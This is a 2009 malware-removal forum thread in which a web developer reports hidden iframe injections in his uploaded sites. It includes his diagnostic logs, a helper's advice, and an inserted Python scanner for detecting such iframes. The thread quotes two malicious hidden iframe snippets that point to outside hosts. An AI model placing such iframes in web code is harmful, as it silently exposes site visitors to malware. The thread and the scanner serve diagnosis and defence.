Active Strange Issues must be some malware

Discussion in 'Malware and Virus Removal Archive' started by zeeshanhashmi, 2009/04/08.

  1. 2009/04/08
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Joined:
    2008/01/13
    Messages:
    77
    Likes Received:
    0
    [Active] Strange Issues must be some malware

    Hello Security Masters

    For the last few days, there have been some strange problems with my computer, like:

    1) Some of the software are now.
    2) Sometimes I can not connect to internet.
    3) I am a web programmer, and some of my clients complained that the code I uploaded to their server has some strange code in it. For example:

    <iframe src="http://cutlot.cn/in.cgi?income50" width=1 height=1 style="visibility: hidden">

    echo "<iframe src=\"http://internetcountercheck.com/?click=27319031\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    I checked in DreamWeaver and found that there is nothing like that, but when I open those files in my browser, I found both the strange codes.
    It seems that, like other programs, the trojan / worm has infected my DreamWeaver and FTP program so that it is causing all this.

    Can you please let me know what to do, and how to remove the terror from my computer?

    Regards
    Zeeshan Hashmi
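
The symptom in the post above (hidden 1x1 iframes appearing in files once they are on the server) can be checked for on a downloaded copy of a site. The following is an added example, not part of the original thread: a Python scanner that flags hidden iframes pointing at hosts outside an allowlist, covering both the plain HTML form and the PHP `echo` form with escaped quotes. The function names, sample files and host names are constructed for illustration.

```python
import os
import re
from collections import namedtuple
from urllib.parse import urlparse

Finding = namedtuple("Finding", "line src host reasons")

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
HIDING_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
TINY_RE = re.compile(r"(\d+)(px)?$", re.IGNORECASE)

# Constructed sample input, modelled on the two snippet shapes quoted in the post.
SAMPLE_HTML = '''<html><body>
<h1>Client site</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="http://counter.example.invalid/in.cgi?x" width=1 height=1 style="visibility: hidden">
</body></html>
'''
SAMPLE_PHP = '''<?php
include "header.php";
echo "<iframe src=\\"http://stats.example.invalid/?click=1\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
?>
'''


def parse_attrs(raw):
    """Parse quoted and unquoted attributes of one tag into a dict."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value.strip()
    return attrs


def is_tiny(value):
    """True for 0, 1, 0px or 1px; percentages and larger sizes are not tiny."""
    m = TINY_RE.match(value.strip())
    return bool(m) and int(m.group(1)) <= 1


def scan_text(text, allowed_hosts):
    """Return a Finding for every hidden iframe whose host is not allowlisted."""
    # PHP/JS string literals carry the tag with escaped quotes; unescape them so
    # one attribute parser covers both forms. Newlines are untouched, so line
    # numbers computed on the normalized text match the original file.
    normalized = text.replace('\\"', '"').replace("\\'", "'")
    findings = []
    for m in IFRAME_RE.finditer(normalized):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        try:
            host = (urlparse(src).hostname or "").lower()
        except ValueError:
            host = ""
        reasons = []
        if is_tiny(attrs.get("width", "")) or is_tiny(attrs.get("height", "")):
            reasons.append("size <= 1px")
        if HIDING_CSS.search(attrs.get("style", "")):
            reasons.append("hidden by CSS")
        # Relative (same-site) frames have no host and are not reported.
        if reasons and host and host not in allowed_hosts:
            line = normalized.count("\n", 0, m.start()) + 1
            findings.append(Finding(line, src, host, reasons))
    return findings


def scan_tree(root, allowed_hosts, exts=(".html", ".htm", ".php", ".js")):
    """Scan every web file under root; return {path: [Finding, ...]}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_text(fh.read(), allowed_hosts)
            if findings:
                report[path] = findings
    return report


if __name__ == "__main__":
    allow = {"www.youtube.com"}  # hosts the site is expected to embed
    for label, text in (("sample.html", SAMPLE_HTML), ("sample.php", SAMPLE_PHP)):
        for f in scan_text(text, allow):
            print(f"{label}:{f.line}: {f.host} ({', '.join(f.reasons)})")
```

Running it against a fresh download from the server and against the local working copy shows whether the injection happens before or after upload.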
     
  2. 2009/04/09
    Arie

    Arie Administrator Administrator Staff

    Joined:
    2001/12/27
    Messages:
    15,174
    Likes Received:
    412
    Hi,

    Read this post as indicated at the top of this forum & follow the instructions.
     
    Arie,
    #2

  4. 2009/04/09
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Thanks, here is the contents of DDS.TXT

    //---------------------------------------------

    DDS (Ver_09-03-16.01) - FAT32x86
    Run by Zeeshan Hashmi at 20:25:48.98 on Thu 04/09/2009
    Internet Explorer: 6.0.2900.2180 BrowserJavaVersion: 1.6.0_12
    Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1013.303 [GMT 5:00]

    AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)
    AV: McAfee VirusScan *On-access scanning enabled* (Updated)
    FW: McAfee Personal Firewall *enabled*

    ============== Running Processes ===============

    C:\WINDOWS\system32\svchost -k DcomLaunch
    svchost.exe
    C:\WINDOWS\System32\svchost.exe -k netsvcs
    svchost.exe
    svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\WINDOWS\Explorer.EXE
    C:\PROGRA~1\A4Tech\Keyboard\Ikeymain.exe
    C:\WINDOWS\system32\igfxtray.exe
    C:\WINDOWS\system32\igfxpers.exe
    D:\Program Files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe
    C:\Program Files\McAfee.com\Agent\mcagent.exe
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\Java\jre6\bin\jusched.exe
    C:\Documents and Settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
    D:\Program Files\Apache Software Foundation\Apache2.2\bin\httpd.exe
    C:\Program Files\Messenger\msmsgs.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\Program Files\Microsoft ActiveSync\Wcescomm.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    D:\Program Files\Apache Software Foundation\Apache2.2\bin\httpd.exe
    C:\PROGRA~1\MICROS~3\rapimgr.exe
    D:\Program Files\Apache Software Foundation\Apache2.2\bin\ApacheMonitor.exe
    C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
    c:\program files\common files\mcafee\mna\mcnasvc.exe
    c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
    C:\Program Files\McAfee\MPF\MPFSrv.exe
    C:\Program Files\McAfee\MSK\MskSrver.exe
    D:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
    C:\WINDOWS\system32\svchost.exe -k netsvcs
    C:\WINDOWS\system32\wscntfy.exe
    C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
    C:\Program Files\Spyware Terminator\sp_rsser.exe
    C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
    C:\PROGRA~1\AVG\AVG8\avgrsx.exe
    C:\Program Files\AVG\AVG8\avgcsrvx.exe
    C:\Program Files\AVG\AVG8\avgtray.exe
    C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
    c:\PROGRA~1\mcafee\VIRUSS~1\mcvsshld.exe
    C:\WINDOWS\system32\svchost.exe -k imgsvc
    C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
    C:\PROGRA~1\AVG\AVG8\avgnsx.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    D:\Program Files\Adobe\Adobe Photoshop CS3\Photoshop.exe
    D:\Program Files\Adobe\Adobe InDesign CS3\InDesign.exe
    D:\Program Files\Adobe\Acrobat 8.0\Acrobat\Acrobat.exe
    D:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
    C:\Program Files\AVG\AVG8\avgcsrvx.exe
    c:\PROGRA~1\mcafee.com\agent\mcupdate.exe
    C:\Documents and Settings\Zeeshan Hashmi\Desktop\dds.pif

    ============== Pseudo HJT Report ===============

    uStart Page = about:blank
    uInternet Settings,ProxyOverride = *.local
    uURLSearchHooks: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
    BHO: &Yahoo! Toolbar Helper: {02478d38-c3f9-4efb-9b51-7695eca05670} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
    BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
    BHO: McAfee Phishing Filter: {27b4851a-3207-45a2-b947-be8afe6163ab} - c:\progra~1\mcafee\msk\mskapbho.dll
    BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg8\avgssie.dll
    BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - No File
    BHO: scriptproxy: {7db2d5a0-7241-4e79-b68d-6309f01c5231} - c:\program files\mcafee\virusscan\scriptsn.dll
    BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
    BHO: Adobe PDF Conversion Toolbar Helper: {ae7cd045-e861-484f-8273-0445ee161910} - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
    BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
    BHO: JQSIEStartDetectorImpl Class: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c:\program files\java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    BHO: SingleInstance Class: {fdad4da1-61a2-4fd8-9c17-86f7ac245081} - c:\progra~1\yahoo!\companion\installs\cpn\YTSingleInstance.dll
    TB: Adobe PDF: {47833539-d0c5-4125-9fa8-0819e2eaac93} - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
    TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
    TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    TB: NuSphere ToolBar: {0f62d223-9206-4ea3-9ea8-d0f3c7c82aca} - c:\program files\nusphere\phped\NuSphereIEBar.dll
    EB: Adobe PDF: {182ec0be-5110-49c8-a062-beb1d02a220b} - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
    uRun: [Skype] "c:\program files\skype\phone\Skype.exe" /nosplash /minimized
    uRun: [Google Update] "c:\documents and settings\zeeshan hashmi\local settings\application data\google\update\GoogleUpdate.exe" /c
    uRun: [MSMSGS] "c:\program files\messenger\msmsgs.exe" /background
    uRun: [H/PC Connection Agent] "c:\program files\microsoft activesync\Wcescomm.exe"
    mRun: [iKeyWorks] c:\progra~1\a4tech\keyboard\Ikeymain.exe
    mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
    mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
    mRun: [Persistence] c:\windows\system32\igfxpers.exe
    mRun: [Acrobat Assistant 8.0] "d:\program files\adobe\acrobat 8.0\acrobat\Acrotray.exe"
    mRun: [<NO NAME>]
    mRun: [mcagent_exe] "c:\program files\mcafee.com\agent\mcagent.exe" /runkey
    mRun: [RTHDCPL] RTHDCPL.EXE
    mRun: [SkyTel] SkyTel.EXE
    mRun: [Alcmtr] ALCMTR.EXE
    mRun: [SunJavaUpdateSched] "c:\program files\java\jre6\bin\jusched.exe"
    mRun: [AVG8_TRAY] c:\progra~1\avg\avg8\avgtray.exe
    StartupFolder: c:\docume~1\alluse~1.win\startm~1\programs\startup\adobea~1.lnk - c:\windows\installer\{ac76ba86-1033-0000-7760-000000000003}\_SC_Acrobat.exe
    StartupFolder: c:\docume~1\alluse~1.win\startm~1\programs\startup\adobea~2.lnk - d:\program files\adobe\acrobat 8.0\acrobat\AdobeCollabSync.exe
    StartupFolder: c:\docume~1\alluse~1.win\startm~1\programs\startup\micros~1.lnk - d:\program files\microsoft office\office11\ONENOTEM.EXE
    StartupFolder: c:\docume~1\alluse~1.win\startm~1\programs\startup\monito~1.lnk - d:\program files\apache software foundation\apache2.2\bin\ApacheMonitor.exe
    IE: Append to existing PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert link target to Adobe PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: Convert link target to existing PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert selected links to Adobe PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    IE: Convert selected links to existing PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    IE: Convert selection to Adobe PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: Convert selection to existing PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convert to Adobe PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
    IE: E&xport to Microsoft Excel - d:\progra~1\micros~1\office11\EXCEL.EXE/3000
    IE: NuSphere PhpED :: Debug this page - c:\program files\nusphere\phped\NuSphereIEBar.dll/1000
    IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
    IE: {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - {2EAF5BB0-070F-11D3-9307-00C04FAE2D4F} - c:\progra~1\micros~3\INetRepl.dll
    IE: {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - {2EAF5BB0-070F-11D3-9307-00C04FAE2D4F} - c:\progra~1\micros~3\INetRepl.dll
    IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - d:\progra~1\micros~1\office11\REFIEBAR.DLL
    DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab
    DPF: {CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab
    DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab
    Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg8\avgpp.dll
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
    Notify: avgrsstarter - avgrsstx.dll
    Notify: igfxcui - igfxdev.dll
    SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

    ================= FIREFOX ===================

    FF - ProfilePath - c:\docume~1\zeesha~1\applic~1\mozilla\firefox\profiles\dtdedgo9.default\
    FF - prefs.js: browser.search.defaulturl - hxxp://www.google.com/search?lr=&ie=UTF-8&oe=UTF-8&q=
    FF - prefs.js: browser.search.selectedEngine - Google
    FF - prefs.js: browser.startup.homepage -
    FF - component: c:\program files\avg\avg8\firefox\components\avgssff.dll
    FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
    FF - plugin: c:\documents and settings\zeeshan hashmi\local settings\application data\google\update\1.2.141.5\npGoogleOneClick7.dll
    FF - plugin: d:\program files\adobe\acrobat 8.0\acrobat\browser\nppdf32.dll

    ============= SERVICES / DRIVERS ===============

    R1 AvgLdx86;AVG Free AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2009-4-9 325640]
    R1 AvgMfx86;AVG Free On-access Scanner Minifilter Driver x86;c:\windows\system32\drivers\avgmfx86.sys [2009-4-9 27656]
    R1 AvgTdiX;AVG Free8 Network Redirector;c:\windows\system32\drivers\avgtdix.sys [2009-4-9 108552]
    R1 mfehidk;McAfee Inc. mfehidk;c:\windows\system32\drivers\mfehidk.sys [2009-1-11 213640]
    R2 Apache2.2;Apache2.2;d:\program files\apache software foundation\apache2.2\bin\httpd.exe [2008-12-10 24636]
    R2 avg8wd;AVG Free8 WatchDog;c:\progra~1\avg\avg8\avgwdsvc.exe [2009-4-9 298264]
    R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\mcafee\siteadvisor\McSACore.exe [2009-2-6 210216]
    R2 McProxy;McAfee Proxy Service;c:\progra~1\common~1\mcafee\mcproxy\mcproxy.exe [2009-1-11 359952]
    R2 McShield;McAfee Real-time Scanner;c:\progra~1\mcafee\viruss~1\mcshield.exe [2009-1-11 144704]
    R3 McSysmon;McAfee SystemGuards;c:\progra~1\mcafee\viruss~1\mcsysmon.exe [2009-1-11 606736]
    R3 mfeavfk;McAfee Inc. mfeavfk;c:\windows\system32\drivers\mfeavfk.sys [2009-1-11 79304]
    R3 mfebopk;McAfee Inc. mfebopk;c:\windows\system32\drivers\mfebopk.sys [2009-1-11 35272]
    R3 mferkdk;McAfee Inc. mferkdk;c:\windows\system32\drivers\mferkdk.sys [2009-1-11 34216]
    R3 mfesmfk;McAfee Inc. mfesmfk;c:\windows\system32\drivers\mfesmfk.sys [2009-1-11 40552]
    S1 ethjnevj;ethjnevj;c:\windows\system32\drivers\ethjnevj.sys [2009-4-8 136256]

    =============== Created Last 30 ================


    ==================== Find3M ====================

    2009-02-20 09:57 410,984 a------- c:\windows\system32\deploytk.dll
    2009-02-06 18:52 49,504 a------- c:\windows\system32\sirenacm.dll
    2009-02-05 11:25 44,544 -------- c:\windows\AWuninstall.exe
    2009-01-12 11:35 86,327 a------- c:\windows\pchealth\helpctr\offlinecache\index.dat
    2009-01-11 01:54 315,392 a------- c:\windows\HideWin.exe
    2009-01-11 01:32 21,640 a------- c:\windows\system32\emptyregdb.dat

    ============= FINISH: 20:26:28.95 ===============
     
  5. 2009/04/09
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Here are the Contents of Attach.Txt

    UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
    IF REQUESTED, ZIP IT UP & ATTACH IT

    DDS (Ver_09-03-16.01)

    Microsoft Windows XP Professional
    Boot Device: \Device\HarddiskVolume1
    Install Date: 1/11/2009 1:37:56 AM
    System Uptime: 4/9/2009 7:50:38 AM (13 hours ago)

    Motherboard: Intel Corporation | | D945GCCR
    Processor: Intel(R) Core(TM)2 CPU 4400 @ 2.00GHz | LGA 775 | 1994/200mhz

    ==== Disk Partitions =========================

    C: is FIXED (FAT32) - 37 GiB total, 7.85 GiB free.
    D: is FIXED (FAT32) - 37 GiB total, 33.398 GiB free.
    E: is FIXED (FAT32) - 37 GiB total, 35.849 GiB free.
    F: is FIXED (FAT32) - 37 GiB total, 35.074 GiB free.
    G: is CDROM (CDFS)
    H: is FIXED (FAT32) - 233 GiB total, 231.724 GiB free.
    I: is CDROM (CDFS)
    J: is Removable

    ==== Disabled Device Manager Items =============

    Class GUID: {4D36E97E-E325-11CE-BFC1-08002BE10318}
    Description: PCI Simple Communications Controller
    Device ID: PCI\VEN_11C1&DEV_0620&SUBSYS_062011C1&REV_00\4&1E46F438&0&20F0
    Manufacturer:
    Name: PCI Simple Communications Controller
    PNP Device ID: PCI\VEN_11C1&DEV_0620&SUBSYS_062011C1&REV_00\4&1E46F438&0&20F0
    Service:

    ==== System Restore Points ===================

    RP71: 2/25/2009 12:05:06 AM - Installed Extension Manager
    RP72: 2/26/2009 7:01:43 PM - System Checkpoint
    RP73: 3/1/2009 8:28:06 AM - System Checkpoint
    RP74: 3/4/2009 6:53:33 PM - System Checkpoint
    RP75: 3/5/2009 8:53:29 PM - System Checkpoint
    RP76: 3/6/2009 9:31:26 PM - System Checkpoint
    RP77: 3/8/2009 1:41:03 PM - System Checkpoint
    RP78: 3/9/2009 6:28:45 PM - System Checkpoint
    RP79: 3/10/2009 7:04:12 PM - System Checkpoint
    RP80: 3/10/2009 7:46:10 PM - Installed Microsoft ActiveSync
    RP81: 3/12/2009 2:06:15 PM - System Checkpoint
    RP82: 3/13/2009 4:47:54 PM - System Checkpoint
    RP83: 3/14/2009 7:58:29 PM - System Checkpoint
    RP84: 3/15/2009 8:13:11 PM - System Checkpoint
    RP85: 3/16/2009 8:45:18 PM - System Checkpoint
    RP86: 3/18/2009 9:35:29 AM - Removed Windows Live Communications Platform
    RP87: 3/18/2009 9:36:07 AM - Removed Windows Live Call
    RP88: 3/18/2009 9:36:36 AM - Removed Windows Live Essentials
    RP89: 3/19/2009 1:06:04 PM - System Checkpoint
    RP90: 3/19/2009 11:16:41 PM - Installed Auto Avatar Prerequisites.
    RP91: 3/20/2009 1:42:28 PM - Removed Auto Avatar Prerequisites.
    RP92: 3/21/2009 2:05:33 PM - System Checkpoint
    RP93: 3/22/2009 3:32:56 PM - System Checkpoint
    RP94: 3/23/2009 6:43:37 PM - System Checkpoint
    RP95: 3/25/2009 10:51:47 AM - System Checkpoint
    RP96: 3/26/2009 11:45:07 AM - System Checkpoint
    RP97: 3/27/2009 3:24:27 PM - System Checkpoint
    RP98: 3/28/2009 4:37:09 PM - System Checkpoint
    RP99: 3/30/2009 8:43:54 AM - System Checkpoint
    RP100: 3/31/2009 11:06:48 AM - System Checkpoint
    RP101: 4/1/2009 4:03:33 PM - System Checkpoint
    RP102: 4/2/2009 5:04:59 PM - System Checkpoint
    RP103: 4/3/2009 5:48:40 PM - System Checkpoint
    RP104: 4/5/2009 10:06:51 AM - System Checkpoint
    RP105: 4/6/2009 12:44:28 PM - System Checkpoint
    RP106: 4/7/2009 12:55:55 PM - System Checkpoint
    RP107: 4/8/2009 1:00:13 PM - System Checkpoint
    RP108: 4/8/2009 6:55:52 PM - Installed Windows XP KB958644.
    RP109: 4/9/2009 8:28:15 AM - Spyware Terminator - restore point
    RP110: 4/9/2009 9:14:24 AM - Spyware Terminator - restore point
    RP111: 4/9/2009 9:17:08 AM - Installed AVG Free 8.5
    RP112: 4/9/2009 9:20:01 AM - Avg8 Update

    ==== Installed Programs ======================

    3D Shadow by Lokas Software
    A4Tech iKeyWorks 7.72
    AAC Decoder
    Add or Remove Adobe Creative Suite 3 Design Premium
    Adobe Acrobat 8 Professional
    Adobe Anchor Service CS3
    Adobe Asset Services CS3
    Adobe Bridge CS3
    Adobe Bridge Start Meeting
    Adobe BridgeTalk Plugin CS3
    Adobe Camera Raw 4.0
    Adobe CMaps
    Adobe Color - Photoshop Specific
    Adobe Color Common Settings
    Adobe Color EU Extra Settings
    Adobe Color JA Extra Settings
    Adobe Color NA Recommended Settings
    Adobe Creative Suite 3 Design Premium
    Adobe Default Language CS3
    Adobe Device Central CS3
    Adobe Dreamweaver CS3
    Adobe ExtendScript Toolkit 2
    Adobe Extension Manager CS3
    Adobe Flash Player 10 ActiveX
    Adobe Flash Player 10 Plugin
    Adobe Fonts All
    Adobe Help Viewer CS3
    Adobe InDesign CS3
    Adobe InDesign CS3 Icon Handler
    Adobe Linguistics CS3
    Adobe MotionPicture Color Files
    Adobe PDF Library Files
    Adobe Photoshop CS3
    Adobe Setup
    Adobe Shockwave Player
    Adobe SING CS3
    Adobe Stock Photos CS3
    Adobe Type Support
    Adobe Update Manager CS3
    Adobe Version Cue CS3 Client
    Adobe WAS CS3
    Adobe WinSoft Linguistics Plugin
    Adobe XMP Panels CS3
    AHV content for Acrobat and Flash
    Apache HTTP Server 2.2.11
    AutoUpdate
    AVG 8.5
    Choice Guard
    CoffeeCup Web Form Builder - Trial
    Compatibility Pack for the 2007 Office system
    CSE HTML Validator Lite v6.52
    DivX Codec
    DivX Converter
    DivX Player
    DivX Plus DirectShow Filters
    DivX Version Checker
    DivX Web Player
    FileZilla Client 3.2.3.1
    Google Chrome
    H.264 Decoder
    High Definition Audio Driver Package - KB888111
    Hotfix for Windows XP (KB909394)
    Intel(R) Graphics Media Accelerator Driver
    Intel(R) PRO Network Connections 11.2.0.69
    Java(TM) 6 Update 12
    Junk Mail filter update
    Macromedia Dreamweaver MX
    Macromedia Extension Manager
    McAfee SecurityCenter
    Microsoft .NET Framework 2.0
    Microsoft ActiveSync
    Microsoft Application Error Reporting
    Microsoft Office OneNote 2003
    Microsoft Office Professional Edition 2003
    Microsoft Silverlight
    Microsoft Visual C++ 2005 Redistributable
    MKV Splitter
    Mozilla Embedded Browser version 2.0
    Mozilla Firefox (3.0.8)
    MSN
    MSVCRT
    MSXML 4.0 SP2 Parser and SDK
    MySQL Server 5.1
    MySQL Tools for 5.0
    NuSphere PhpED version 5.6
    PDF Settings
    php-4.4.8 for NuSphere PhpED
    php-5.2.6 for NuSphere PhpED
    PHP 5.2.8
    Php Documentor version 1.4.2 for NuSphere PhpED
    phpDesigner version 6.2.3
    Polystyle 2.0zo (trial) for NuSphere PhpED
    Realtek High Definition Audio Driver
    Security Update for Windows XP (KB958644)
    Segoe UI
    Skype™ 3.8
    Spyware Terminator
    Tennis Elbow 2005 1.0
    Update for Windows XP (KB898461)
    VC80CRTRedist - 8.0.50727.762
    WebFldrs XP
    Windows Installer 3.1 (KB893803)
    Windows Live Call
    Windows Live Communications Platform
    Windows Live Essentials
    Windows Live Mail
    Windows Live Messenger
    Windows Live Sign-in Assistant
    Windows Live Upload Tool
    WinRAR archiver
    WinSCP 4.2.1 beta
    XP Codec Pack
    Yahoo! Messenger
    Yahoo! Toolbar

    ==== Event Viewer Messages From Past Week ========

    4/5/2009 9:16:28 AM, error: Service Control Manager [7024] - The Apache2.2 service terminated with service-specific error 1 (0x1).
    4/3/2009 7:34:44 AM, error: Server [2505] - The server could not bind to the transport \Device\NetBT_Tcpip_{6E883212-8725-4313-8967-A7BFD24DB8A8} because another computer on the network has the same name. The server could not start.
    4/2/2009 11:10:02 AM, error: Dhcp [1002] - The IP address lease 192.168.1.2 for the Network Card with network address 0019D19D4B36 has been denied by the DHCP server 192.168.15.1 (The DHCP Server sent a DHCPNACK message).
    4/2/2009 11:07:32 AM, error: Dhcp [1002] - The IP address lease 192.168.15.2 for the Network Card with network address 0019D19D4B36 has been denied by the DHCP server 192.168.1.1 (The DHCP Server sent a DHCPNACK message).
    4/2/2009 9:14:36 AM, error: Dhcp [1002] - The IP address lease 192.168.15.3 for the Network Card with network address 0019D19D4B36 has been denied by the DHCP server 192.168.15.1 (The DHCP Server sent a DHCPNACK message).
    4/7/2009 1:02:23 PM, error: ipnathlp [32003] - The Network Address Translator (NAT) was unable to request an operation of the kernel-mode translation module. This may indicate misconfiguration, insufficient resources, or an internal error. The data is the error code.
    4/7/2009 7:33:57 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the crd service to connect.
    4/7/2009 7:33:57 PM, error: Service Control Manager [7000] - The crd service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
    4/9/2009 4:42:08 PM, error: Service Control Manager [7031] - The McAfee Real-time Scanner service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.

    ==== End Of File ===========================
     
  6. 2009/04/09
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Please guide me what's next to do.
     
  7. 2009/04/09
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Another BAD has started!

    Now my applications, i.e. browsers (Firefox), DreamWeaver, Acrobat etc., show an "Illegal Operation" dialog box.

    Please guide, there must be something wrong!
     
  8. 2009/04/10
    Arie

    Arie Administrator Administrator Staff

    The more you bump your topic, the longer it takes to get a reply. As stated in the instructions:

     
    Arie,
    #7
  9. 2009/04/12
    Geri Lifetime Subscription

    Geri Inactive Alumni

    Joined:
    2003/03/02
    Messages:
    4,580
    Likes Received:
    7
    Hi zeeshanhashmi

    You are running two anti-virus programs. This is not a good idea; they can conflict with each other and actually give you less protection and cause system problems.
    Please remove one ( 1 ) of them.

    AVG 8.5
    McAfee SecurityCenter


    Now please do this.

    • Please go to Jotti's malware scan
    • Copy and paste the following file path into the "File to upload & scan" box at the top of the page, one at a time:
      • c:\windows\system32\drivers\ethjnevj.sys
    • Click on the submit button
    • Please post the results in your next reply.

    Geri
     
    Geri,
    #8
  10. 2009/04/12
    zeeshanhashmi

    zeeshanhashmi Inactive Thread Starter

    Hello Geri, I was really missing you! Thanks for taking on my issue.

    I'm removing the AVG antivirus from my system; actually, my internet provider told me to install AVG in order to be safe from the destruction of CONFICKER.

    Here are the results.

    Scan taken on 12 Apr 2009 09:14:17 (GMT)
    A-Squared
    Found nothing
    AntiVir
    Found nothing
    ArcaVir
    Found nothing
    Avast
    Found Win32:Sloup
    AVG Antivirus
    Found nothing
    BitDefender
    Found Trojan.Rlsloupa.A
    ClamAV
    Found nothing
    CPsecure
    Found nothing
    Dr.Web
    Found Trojan.Siggen.2194
    F-Prot Antivirus
    Found W32/IEBooot.A.gen!Eldorado
